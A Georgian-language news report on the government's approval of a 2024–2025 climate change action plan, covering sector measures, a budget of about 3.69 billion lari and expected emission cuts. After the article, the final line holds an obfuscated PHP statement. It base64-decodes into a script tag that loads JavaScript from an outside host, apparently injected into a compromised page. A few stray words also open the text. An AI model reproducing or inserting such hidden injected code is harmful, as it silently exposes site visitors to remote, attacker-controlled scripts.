celsiusi
ავერსი შნაიდერი

 მთავრობის დღევანდელ სხდომაზე კლიმატის ცვლილების 2024-2025 წლების სამოქმედო გეგმა დაამტკიცეს.

როგორც გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროში აღნიშნავენ, კლიმატის ცვლილება და მასთან დაკავშირებული არაერთი გამოწვევა მსოფლიო დღის წესრიგის ერთ-ერთი უმნიშვნელოვანესი პრიორიტეტია.

„საქართველო, საერთაშორისო საზოგადოების შეთანხმებებისა და გადაწყვეტილებების ფარგლებში, აქტიურად ახორციელებს ყველა იმ აქტივობას, რომელიც დაკავშირებულია კლიმატის ცვლილებებთან ადაპტაციისა და შერბილების საკითხებთან.

გაერო-ს კლიმატის ცვლილების ჩარჩო კონვენციის პარიზის შეთანხმებისა და საქართველო-ევროკავშირს შორის ასოცირების შესახებ შეთანხმებით აღებული ვალდებულებების შესრულების მიზნით, საქართველომ 2021 წელს შეიმუშავა და დაამტკიცა ეროვნულად განსაზღვრული წვლილის დოკუმენტი (NDC), რომლითაც განისაზღვრა 2030 წლისთვის სათბური აირების ემისიების შემცირების სამიზნე მაჩვენებლები“, – აღნიშნავენ გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროში.

მათივე ცნობით, სამოქმედო გეგმაში გაიწერა უახლოეს ორ წელიწადში კლიმატის ცვლილების შერბილების კუთხით ქვეყანაში დაგეგმილი ღონისძიებები ქვეყნის ეკონომიკის შვიდ სექტორში: ენერგეტიკის გენერაცია და გადაცემა; ტრანსპორტი; შენობები; მრეწველობა; სოფლის მეურნეობა; ნარჩენების მართვა; სატყეო მეურნეობა.

საერთო ბიუჯეტი შეადგენს 3 694 328 186 ლარს. დაფინანსების მნიშვნელოვანი წილი მოდის ინფრასტრუქტურულ პროექტებზე ენერგეტიკისა და ნარჩენების სექტორებში. კერძოდ, ენერგეტიკის სექტორში პრიორიტეტული მიმართულებები იქნება ქარის, მზისა და ჰიდრო ელექტროსადგურების მშენებლობა. ნარჩენების სექტორში მნიშვნელოვანია ახალი ნაგავსაყრელების მოწყობა/მოწყობის დაწყება და არსებული ნაგავსაყრელების განახლება, ასევე ურბანული ჩამდინარე წყლების გამწმენდი ნაგებობების მშენებლობა.

„მნიშვნელოვანი მიმართულებაა ტრანსპორტის სექტორიც, რომელშიც პრიორიტეტულია მობილობის არამოტორიზებული (მეტროს სადგურების მოდერნიზაცია, საბაგირო ტრანსპორტის განვითარების ხელშეწყობა, ველობილიკების მოწყობა) საშუალებებისა და საზოგადოებრივი ტრანსპორტის წახალისება (კერძოდ, თბილისში). ასევე, ავტომობილებიდან გამონაბოლქვის დონის კონტროლის ტექნიკური მექანიზმის დანერგვა.

სოფლის მეურნეობის სექტორში აქცენტი გაკეთდება ქარსაფარი ზოლების მდგრადი მართვის გაუმჯობესებასა და კლიმატ-გონივრული სოფლის მეურნეობის პრაქტიკების თანდათანობით დანერგვასა და მათ პოპულარიზაციაზე ცნობიერების ამაღლების საშუალებით.

სატყეო სექტორის მიერ ნახშირბადის შთანთქმის შესაძლებლობების გაძლიერების მიზნით დაგეგმილია ტყის აღდგენა-გაშენების ღონისძიებები დეგრადირებული ტყის ტერიტორიაზე, ასევე განსაკუთრებული ყურადღება დაეთმობა ტყის მდგრადი მართვის გაუმჯობესებას (გაგრძელდება ტყის ინვენტარიზაცია, მომზადდება ტყის მართვის გეგმები ხუთი სატყეო უბნისთვის და დაიხვეწება ტყის საინფორმაციო და მონიტორინგის სისტემა).

აღსანიშნავია, რომ 2021-2023 წლების და ახალი, 2024-2025 წლების კლიმატის სამოქმედო გეგმებით განსაზღვრული ღონისძიებები რომ არ გატარებულიყო, 10-12 პროცენტით მეტი კლიმატის ცვლილების გამომწვევი აირების ემისია ექნებოდა საქართველოს. ახალი ორწლიანი გეგმა საშუალებას მოგვცემს, ემისიების დონე შევინარჩუნოთ 10-12 პროცენტით დაბალ ნიშნულზე, რადგან 2021-2023 წლებში განხორციელებული ღონისძიებების ეფექტიც აისახება შემცირებულ ემისიებში, რომელსაც დაემატება 2024-2025 წლებში განსახორციელებელი საქმიანობები. ეს განსაკუთრებით მნიშვნელოვანია საქართველოსთვის, როგორც ევროკავშირის წევრობის კანდიდატი ქვეყნისთვის, რათა კლიმატის ცვლილების მიმართულებით ევროკავშირის პოლიტიკის შესაბამისად დასახული ამბიციური მიზნები მიღწეული იყოს.

მნიშვნელოვანია, რომ დოკუმენტი მომზადდა შესაბამისი უწყებების აქტიური ჩართულობითა და მონაწილეობით, ასევე გაიმართა არაერთი საჯარო კონსულტაცია ყველა დაინტერესებული მხარის ჩართულობით“, – აცხადებენ გარემოს დაცვის სამინისტროში.

210
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");